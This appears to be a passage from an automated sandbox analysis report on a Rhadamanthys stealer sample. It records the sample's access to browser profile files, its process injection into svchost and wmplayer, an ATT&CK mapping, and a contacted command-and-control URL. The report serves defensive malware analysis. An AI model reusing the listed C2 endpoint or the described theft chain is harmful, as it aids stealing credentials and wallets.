                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\NetworkJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dirJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Mozilla\Firefox\Profiles\c6rta27r.defaultJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\fmgjjmmmlfnkbppncabfkddbjimcfncm\Icons MaskableJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCacheJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources\agimnkijcaahngcdmfeangaknmldooml\Icons MaskableJump to behavior
                      Source: C:\Windows\System32\svchost.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                      Source: C:\Windows\System32\svchost.exeDirectory queried: C:\Users\user\Documents\FENIVHOIKNJump to behavior
                      Source: C:\Windows\System32\svchost.exeDirectory queried: C:\Users\user\Documents\HTAGVDFUIEJump to behavior
                      Source: C:\Windows\System32\svchost.exeDirectory queried: C:\Users\user\Documents\KZWFNRXYKIJump to behavior
                      Source: C:\Windows\System32\svchost.exeDirectory queried: C:\Users\user\Documents\UMMBDNEQBNJump to behavior
                      Source: C:\Windows\System32\svchost.exeDirectory queried: C:\Users\user\Documents\WKXEWIOTXIJump to behavior
                      Source: C:\Windows\System32\svchost.exeDirectory queried: C:\Users\user\Documents\YPSIACHYXWJump to behavior
                      Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4188, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Yara detected RHADAMANTHYS Stealer
                      Source: Yara matchFile source: 0000000F.00000002.2231959353.000001C276401000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000003.1667413757.00000243663E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000E.00000002.1683742387.00000243665E1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000003.1670933123.000001C276180000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Windows\System32\svchost.exeCode function: 15_3_00007DF426AB59B0 CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,15_3_00007DF426AB59B0
                      Source: C:\Program Files\Windows Media Player\wmplayer.exeCode function: 35_2_0000021AB2FDD004 CreateNamedPipeW,BindIoCompletionCallback,ConnectNamedPipe,35_2_0000021AB2FDD004

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                      Windows Management Instrumentation                      		1
                      DLL Side-Loading                      		1
                      Exploitation for Privilege Escalation                      		1
                      Deobfuscate/Decode Files or Information                      		1
                      OS Credential Dumping                      		2
                      System Time Discovery                      		Remote Services1
                      Archive Collected Data                      		1
                      Ingress Tool Transfer                      		Exfiltration Over Other Network Medium1
                      System Shutdown/Reboot
                      CredentialsDomainsDefault Accounts12
                      Native API                      		1
                      Create Account                      		1
                      Abuse Elevation Control Mechanism                      		1
                      Abuse Elevation Control Mechanism                      		31
                      Input Capture                      		14
                      File and Directory Discovery                      		Remote Desktop Protocol21
                      Data from Local System                      		21
                      Encrypted Channel                      		Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts2
                      Command and Scripting Interpreter                      		Logon Script (Windows)1
                      DLL Side-Loading                      		3
                      Obfuscated Files or Information                      		Security Account Manager28
                      System Information Discovery                      		SMB/Windows Admin Shares31
                      Input Capture                      		1
                      Non-Standard Port                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook413
                      Process Injection                      		1
                      Software Packing                      		NTDS161
                      Security Software Discovery                      		Distributed Component Object Model1
                      Clipboard Data                      		3
                      Non-Application Layer Protocol                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      DLL Side-Loading                      		LSA Secrets1
                      Virtualization/Sandbox Evasion                      		SSHKeylogging14
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts121
                      Masquerading                      		Cached Domain Credentials5
                      Process Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Virtualization/Sandbox Evasion                      		DCSync1
                      Application Window Discovery                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job413
                      Process Injection                      		Proc Filesystem1
                      System Network Configuration Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1577525 Sample: HI6VIJERUn.exe Startdate: 18/12/2024 Architecture: WINDOWS Score: 100 84 x.ns.gin.ntt.net 2->84 86 time.windows.com 2->86 88 8 other IPs or domains 2->88 110 Suricata IDS alerts for network traffic 2->110 112 Found malware configuration 2->112 114 Multi AV Scanner detection for submitted file 2->114 116 6 other signatures 2->116 12 HI6VIJERUn.exe 23 2->12         started        15 msedge.exe 16 71 2->15         started        signatures3 process4 file5 72 C:\Users\user\AppData\Local\Temp\Limited, COM 12->72 dropped 74 C:\Users\user\AppData\Local\Temp\Buffer, PE32+ 12->74 dropped 17 cmd.exe 3 12->17         started        21 msedge.exe 15->21         started        23 msedge.exe 15->23         started        26 msedge.exe 15->26         started        28 msedge.exe 15->28         started        process6 dnsIp7 70 C:\Users\user\AppData\Local\Temp\...\Hop.com, PE32+ 17->70 dropped 100 Drops PE files with a suspicious file extension 17->100 30 Hop.com 17->30         started        33 cmd.exe 2 17->33         started        35 conhost.exe 17->35         started        42 6 other processes 17->42 37 msedge.exe 21->37         started        40 msedge.exe 21->40         started        96 ssl.bingadsedgeextension-prod-europe.azurewebsites.net 94.245.104.56, 443, 49724, 49725 MICROSOFT-CORP-MSN-AS-BLOCKUS United Kingdom 23->96 file8 signatures9 process10 dnsIp11 126 Modifies the context of a thread in another process (thread injection) 30->126 128 Injects a PE file into a foreign processes 30->128 130 Found direct / indirect Syscall (likely to bypass EDR) 30->130 44 Hop.com 1 30->44         started        47 Hop.com 30->47         started        90 googlehosted.l.googleusercontent.com 172.217.17.65, 443, 49740 GOOGLEUS United States 37->90 92 chrome.cloudflare-dns.com 162.159.61.3, 443, 49741, 49742 CLOUDFLARENETUS United States 37->92 94 clients2.googleusercontent.com 37->94 signatures12 process13 signatures14 124 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 44->124 49 svchost.exe 6 44->49         started        53 WerFault.exe 2 44->53         started        process15 dnsIp16 76 92.255.85.148, 3574, 443, 49708 SOVTEL-ASRU Russian Federation 49->76 78 time-a-g.nist.gov 129.6.15.28, 123, 52332 US-NATIONAL-INSTITUTE-OF-STANDARDS-AND-TECHNOLOGYUS United States 49->78 80 6 other IPs or domains 49->80 102 Found evasive API chain (may stop execution after checking mutex) 49->102 104 Found many strings related to Crypto-Wallets (likely being stolen) 49->104 106 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 49->106 108 Tries to harvest and steal browser information (history, passwords, etc) 49->108 55 wmplayer.exe 49->55         started        58 chrome.exe 49->58         started        61 msedge.exe 15 49->61         started        signatures17 process18 dnsIp19 118 Found many strings related to Crypto-Wallets (likely being stolen) 55->118 120 Writes to foreign memory regions 55->120 122 Allocates memory in foreign processes 55->122 63 dllhost.exe 55->63         started        98 239.255.255.250 unknown Reserved 58->98 65 chrome.exe 58->65         started        68 msedge.exe 61->68         started        signatures20 process21 dnsIp22 82 127.0.0.1 unknown unknown 65->82

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      HI6VIJERUn.exe55%ReversingLabsWin32.Trojan.Generic

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Local\Temp\407310\Hop.com0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\Buffer0%ReversingLabs
                      C:\Users\user\AppData\Local\Temp\Limited0%ReversingLabs

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      https://92.255.85.148:3574/b3ad89898301a3d857946a/qb6h1inb.gr7dt0%Avira URL Cloudsafe
                      http://127.01:0%Avira URL Cloudsafe
                      http://anglebug.com/687630%Avira URL Cloudsafe
                      http://127.0.0.1:8000/254d3199/14c90ac50(p0%Avira URL Cloudsafe
                      http://anglebug.com/822960%Avira URL Cloudsafe
                      https://92.255.85.148:3574/b3ad89898301a3d857946a/qb6h1inb.gr7dti0%Avira URL Cloudsafe
                      http://127.0.0.1:%u/json/list?t=%u0%Avira URL Cloudsafe
                      http://127.0.0.1:8000/254d3199/72f3a0b30%Avira URL Cloudsafe
                      http://127.0.0.1:8000/254d3199/14c90ac5Y0%Avira URL Cloudsafe
                      http://anglebug.com/4324YD0%Avira URL Cloudsafe
                      https://permanently-removed.invalid/reauth/v1beta/users/40%Avira URL Cloudsafe
                      http://anglebug.com/350250%Avira URL Cloudsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      time.cloudflare.com
                      		162.159.200.123
                      		truefalse
                        		high
                        chrome.cloudflare-dns.com
                        		162.159.61.3
                        		truefalse
                          		high
                          gbg1.ntp.netnod.se
                          		194.58.203.20
                          		truefalse
                            		unknown
                            x.ns.gin.ntt.net
                            		129.250.35.250
                            		truefalse
                              		high
                              time.google.com
                              		216.239.35.0
                              		truefalse
                                		high
                                ssl.bingadsedgeextension-prod-europe.azurewebsites.net
                                		94.245.104.56
                                		truefalse
                                  		high
                                  ntp.time.nl
                                  		94.198.159.10
                                  		truefalse
                                    		high
                                    time-a-g.nist.gov
                                    		129.6.15.28
                                    		truefalse
                                      		high
                                      googlehosted.l.googleusercontent.com
                                      		172.217.17.65
                                      		truefalse
                                        		high
                                        time.facebook.com
                                        		129.134.25.123
                                        		truefalse
                                          		high
                                          clients2.googleusercontent.com
                                          		unknown
                                          		unknownfalse
                                            		high
                                            gbg1.ntp.se
                                            		unknown
                                            		unknownfalse
                                              		unknown
                                              time.windows.com
                                              		unknown
                                              		unknownfalse
                                                		high
                                                msqMXFuLWSyMSfLTXxbcbTiF.msqMXFuLWSyMSfLTXxbcbTiF
                                                		unknown
                                                		unknownfalse
                                                  		unknown

                                                  Contacted URLs

                                                  NameMaliciousAntivirus DetectionReputation
                                                  https://92.255.85.148:3574/b3ad89898301a3d857946a/qb6h1inb.gr7dttrue
                                                  • Avira URL Cloud: safe
                                                  		unknown

                                                  URLs from Memory and Binaries

                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  https://duckduckgo.com/chrome_newtabsvchost.exe, 0000000F.00000003.1860719211.000001C278678000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1880928007.0000422C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1878349012.0000422C006EC000.00000004.00000800.00020000.00000000.sdmp, Web Data.25.drfalse
                                                    		high
                                                    http://127.0.0.1:8000/254d3199/72f3a0b3msedge.exe, 00000016.00000002.1897055121.000001E2500A1000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000016.00000002.1898819277.0000198C00210000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://duckduckgo.com/ac/?q=chrome.exe, 00000013.00000002.1881066611.0000422C00C0C000.00000004.00000800.00020000.00000000.sdmp, Web Data.25.drfalse
                                                      		high
                                                      https://safebrowsing.google.com/safebrowsing/clientreport/chrome-sct-auditingchrome.exe, 00000013.00000002.1875052211.0000422C00078000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://permanently-removed.invalid/oauth2/v2/tokeninfomsedge.exe, 00000016.00000003.1891357678.0000341C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890857506.0000341C0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890151780.0000341C00268000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://myaccount.google.com/find-your-phone?utm_source=ga-chrome-actions&utm_medium=findYourPhonechrome.exe, 00000013.00000002.1878518613.0000422C00774000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877281886.0000422C00474000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://anglebug.com/4633chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://anglebug.com/7382chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://issuetracker.google.com/284462263chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://googleusercontent.com/cr_components/page_image_service/page_image_service.mojom-webui.jschrome.exe, 00000013.00000002.1877687874.0000422C00584000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://keep.google.com/u/0/?usp=chrome_actions#NEWNOTEklychrome.exe, 00000013.00000002.1878579894.0000422C00798000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877240234.0000422C00444000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1878623270.0000422C007B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://docs.google.com/manifest.json0.32.drfalse
                                                                        		high
                                                                        https://anglebug.com/7714chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://anglebug.com/82296chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://unisolated.invalid/chrome.exe, 00000013.00000002.1879372254.0000422C009B4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.google.com/chrome/tips/chrome.exe, 00000013.00000002.1879180867.0000422C0093C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1875915640.0000422C001AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1878623270.0000422C007B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://anglebug.com/6248chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://anglebug.com/6929chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://anglebug.com/68763chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  		unknown
                                                                                  http://anglebug.com/5281chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    https://issuetracker.google.com/255411748chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://docs.google.com/document/u/0/create?usp=chrome_actionschrome.exe, 00000013.00000002.1878579894.0000422C00798000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877240234.0000422C00444000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1878623270.0000422C007B8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://permanently-removed.invalid/oauth2/v4/tokenmsedge.exe, 00000016.00000003.1891357678.0000341C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890857506.0000341C0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890151780.0000341C00268000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://anglebug.com/7246chrome.exe, 00000013.00000002.1877723507.0000422C005A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://127.0.0.1:%u/json/list?t=%uwmplayer.exe, 00000023.00000003.2136167380.0000021AB3215000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 00000023.00000002.2694366363.00007DF4F821D000.00000004.00000001.00020000.00000000.sdmp, wmplayer.exe, 00000023.00000003.2136103443.0000021AB31AD000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                            • Avira URL Cloud: safe
                                                                                            		unknown
                                                                                            https://anglebug.com/7369chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://anglebug.com/7489chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://duckduckgo.com/?q=chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1878349012.0000422C006EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1878785063.0000422C00834000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://chrome.google.com/webstorechrome.exe, 00000013.00000002.1876602417.0000422C00328000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000002.1902875706.0000341C00020000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://drive-daily-2.corp.google.com/manifest.json0.32.drfalse
                                                                                                      		high
                                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icochrome.exe, 00000013.00000002.1881066611.0000422C00C0C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        		high
                                                                                                        https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=svchost.exe, 0000000F.00000003.1860719211.000001C278678000.00000004.00000020.00020000.00000000.sdmp, Web Data.25.drfalse
                                                                                                          		high
                                                                                                          http://www.autoitscript.com/autoit3/XHop.com, 0000000A.00000000.1481481554.00007FF68C524000.00000002.00000001.01000000.00000007.sdmp, Hop.com, 0000000C.00000002.1602987675.00007FF68C524000.00000002.00000001.01000000.00000007.sdmp, Hop.com, 0000000E.00000002.1684720884.00007FF68C524000.00000002.00000001.01000000.00000007.sdmpfalse
                                                                                                            		high
                                                                                                            https://issuetracker.google.com/161903006chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              		high
                                                                                                              https://www.ecosia.org/newtab/svchost.exe, 0000000F.00000003.1860719211.000001C278678000.00000004.00000020.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                		high
                                                                                                                https://drive-daily-1.corp.google.com/manifest.json0.32.drfalse
                                                                                                                  		high
                                                                                                                  https://92.255.85.148:3574/b3ad89898301a3d857946a/qb6h1inb.gr7dtisvchost.exe, 0000000F.00000002.2232402260.000001C2785AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1918863263.000001C2785AC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000F.00000003.1829154317.000001C2785AD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  https://drive-daily-5.corp.google.com/manifest.json0.32.drfalse
                                                                                                                    		high
                                                                                                                    https://duckduckgo.com/favicon.icochrome.exe, 00000013.00000002.1880928007.0000422C00BA0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1878349012.0000422C006EC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://127.01:svchost.exe, 0000000F.00000003.1992811813.000001C278646000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      		unknown
                                                                                                                      https://docs.google.com/spreadsheets/u/0/create?usp=chrome_actionschrome.exe, 00000013.00000002.1878409482.0000422C00710000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877373539.0000422C00494000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                        		high
                                                                                                                        https://myaccount.google.com/data-and-privacy?utm_source=ga-chrome-actions&utm_medium=managePrivacychrome.exe, 00000013.00000002.1878518613.0000422C00774000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877281886.0000422C00474000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          		high
                                                                                                                          https://permanently-removed.invalid/chrome/blank.htmlmsedge.exe, 00000016.00000003.1891357678.0000341C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890857506.0000341C0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890151780.0000341C00268000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://anglebug.com/3078chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://anglebug.com/7553chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://anglebug.com/5375chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  https://permanently-removed.invalid/v1/issuetokenmsedge.exe, 00000016.00000003.1891357678.0000341C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890857506.0000341C0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890151780.0000341C00268000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://anglebug.com/5371chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://anglebug.com/4722chrome.exe, 00000013.00000002.1880860396.0000422C00B74000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858102382.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1855014341.0000422C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.1858158715.0000422C00744000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        https://m.google.com/devicemanagement/data/apichrome.exe, 00000013.00000002.1876010025.0000422C0020C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          https://permanently-removed.invalid/reauth/v1beta/users/msedge.exe, 00000016.00000003.1891357678.0000341C00270000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890857506.0000341C0026C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000016.00000003.1890151780.0000341C00268000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://developer.chrome.com/extensions/external_extensions.html)chrome.exe, 00000013.00000002.1877767613.0000422C005E4000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://docs.google.com/presentation/u/0/create?usp=chrome_actionschrome.exe, 00000013.00000002.1878409482.0000422C00710000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877373539.0000422C00494000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://127.0.0.1/chrome.exe, 00000013.00000002.1877687874.0000422C00584000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1875682617.0000422C0014C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1879409281.0000422C009D0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1874933510.0000422C0006C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.1877560803.0000422C00530000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
